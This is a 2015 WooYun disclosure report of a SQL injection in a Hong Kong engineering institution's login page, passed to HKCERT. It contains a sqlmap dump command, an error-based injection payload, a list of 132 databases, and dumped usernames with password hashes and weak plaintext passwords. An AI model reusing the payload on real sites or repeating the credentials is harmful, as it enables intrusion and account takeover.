当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145928

漏洞标题:香港工程师学会某处存在POST型SQL注入漏洞+后台弱密码(132个库)(香港地區)

相关厂商:hkcert香港互联网应急协调中心

漏洞作者: 路人甲

提交时间:2015-10-12 09:54

修复时间:2015-11-29 17:44

公开时间:2015-11-29 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向核心白帽子及相关领域专家公开
2015-11-04: 细节向普通白帽子公开
2015-11-14: 细节向实习白帽子公开
2015-11-29: 细节向公众公开

简要描述:

香港工程师学会某处存在SQL注入漏洞+后台弱密码(132个库)

详细说明:

使用sqlmap进行测试:
测试地址:http://**.**.**.**/login.aspx

python sqlmap.py -u "http://**.**.**.**/login.aspx" --form --batch -p UsrID --technique=E -D HKIE_AC -T tb_Usr -C Usr_name,Usr_pwd --dump


弱密码:
1. jimmy:00000000
2. W C LO:drwclo

漏洞证明:

---
Parameter: UsrID (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJNzc3OTI0NjM5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRubG9naW79t+jTuJcfBVV7mqLjckooBfnAsg==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQK7643hCAL1sK+0CwLmmdGVDALIvNOaAQKC3IfLCZn65Pt3vL2j2d/jloghC1RnzTlm&UsrID=nSUi' AND 7221=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7221=7221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113))) AND 'RNLY'='RNLY&Pwd=&Organizer=RWwO&btnlogin.x=1&btnlogin.y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


available databases [132]:
[*] AIC
[*] ATCACC_ATM
[*] ATCACC_ATM1
[*] ATCACC_ATM2
[*] ATCACC_ATM3
[*] ATCACC_ATM_Global
[*] ATCACC_ATMI
[*] ATCACC_BJ
[*] ATCACC_BJ01
[*] ATCACC_BVI
[*] ATCACC_CD
[*] ATCACC_CQ
[*] ATCACC_DL
[*] ATCACC_DL01
[*] ATCACC_GZ
[*] ATCACC_GZ01
[*] ATCACC_HK
[*] ATCACC_QD
[*] ATCACC_QD01
[*] ATCACC_SH
[*] ATCACC_SH01
[*] ATCACC_SSH
[*] ATCACC_SZ
[*] ATCACC_TJ
[*] ATCACC_TJ01
[*] ATCACC_TW
[*] ATCACC_XI
[*] ATCACC_XI01
[*] ATCMaster
[*] Baby
[*] bsp
[*] BspGbl
[*] chaumet
[*] CheerArt
[*] chm
[*] clinique
[*] COLON_CONTENT_CMT
[*] COLON_CONTENT_CMT1
[*] COLON_CONTENT_CMT3
[*] epdweee
[*] Forums_OZ
[*] FTMltd
[*] goldsource
[*] guess_test
[*] guess_travel
[*] Guesshandbags
[*] hierarchy
[*] HKBA
[*] HKBA_20150122_Bak
[*] HKBA_data
[*] hkba_help
[*] hkba_web
[*] hkba_web2
[*] HKBA_WEB_Live
[*] hkba_web_uat
[*] hkba_webtest
[*] HkbaAccount
[*] HKBAFocus
[*] HKBAWEB
[*] HKElectric
[*] HKElectric_uat
[*] HKIE-FEdigest
[*] HKIE_AC
[*] HKIE_AMC
[*] HKIE_BD
[*] hkie_bk
[*] HKIE_BM
[*] HKIE_BS
[*] HKIE_BS_DynamicMenu
[*] HKIE_CA
[*] HKIE_CMT
[*] HKIE_CPDS
[*] HKIE_CV
[*] HKIE_CV_20131029
[*] HKIE_CV_TEST
[*] HKIE_EG
[*] HKIE_EG_TEST
[*] HKIE_Electrical
[*] HKIE_Electrical_new
[*] HKIE_EN
[*] HKIE_EV
[*] HKIE_EV_ForEVTestWebSite
[*] HKIE_FE
[*] HKIE_FE_Copy20100108
[*] HKIE_FE_ForFETestWebSite
[*] HKIE_LT
[*] HKIE_MC
[*] HKIE_MC_backUpAt2010_03_12
[*] HKIE_MI
[*] HKIE_MT
[*] HKIE_NE
[*] HKIE_NE_Bak_2009_11_30
[*] HKIE_SSC
[*] HKIE_ST
[*] HKIE_TEMP_DB
[*] hkie_YMC
[*] hkmta
[*] HLS
[*] hls_temp
[*] HLSnew
[*] imss
[*] imsseuq
[*] innoways_edm
[*] jimmy
[*] kifung_CMT
[*] Kingdom_CMT
[*] master
[*] MMS
[*] mms_test
[*] model
[*] msdb
[*] mta_test
[*] nano
[*] OP-2
[*] op_intranet_new
[*] origins_quota
[*] PCCW_CTRWS
[*] PCCW_CTRWS_CHK
[*] pccw_quota
[*] pccw_quota_sim
[*] policy_demo
[*] processis
[*] QASWEB_TEMP
[*] superdefense
[*] t-marketing
[*] tempdb
[*] Vanny
[*] Vote
[*] wellonmedical
[*] WineDining
[*] wontrad
[*] wuyishan


Database: HKIE_AC
[16 tables]
+-----------------------+
| tb_DocUpload |
| tb_Event |
| tb_EventGroupType |
| tb_LeftMenu |
| tb_LeftSubMenu |
| tb_News |
| tb_PageContent |
| tb_PageContentSetting |
| tb_PastSession |
| tb_PastSessionType |
| tb_Photo |
| tb_PhotoAlbum |
| tb_S_Doc |
| tb_S_DocType |
| tb_Usr |
| tb_event_reply_from |
+-----------------------+


Table: tb_Usr
[10 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Crt_by | varchar |
| Crt_dte | datetime |
| Email_adds | varchar |
| Is_Enable | char |
| Staff_name | varchar |
| Tel | varchar |
| Update_by | varchar |
| Update_dte | datetime |
| Usr_name | varchar |
| Usr_pwd | varchar |
+------------+----------+


Table: tb_Usr
[3 entries]
+----------+--------------------------+
| Usr_name | Usr_pwd |
+----------+--------------------------+
| jimmy | 3Ush6e9x4SkRg6RrkTrm8g== |
| W C LO | CJgGly+9rN5dcsNjmlEeJw== |
| admin | H0SAi4swyo2o6p1FTf1U+w== |
+----------+--------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-15 17:42

厂商回复:

已聯絡相關機構處理

最新状态:

暂无


漏洞评价:

评价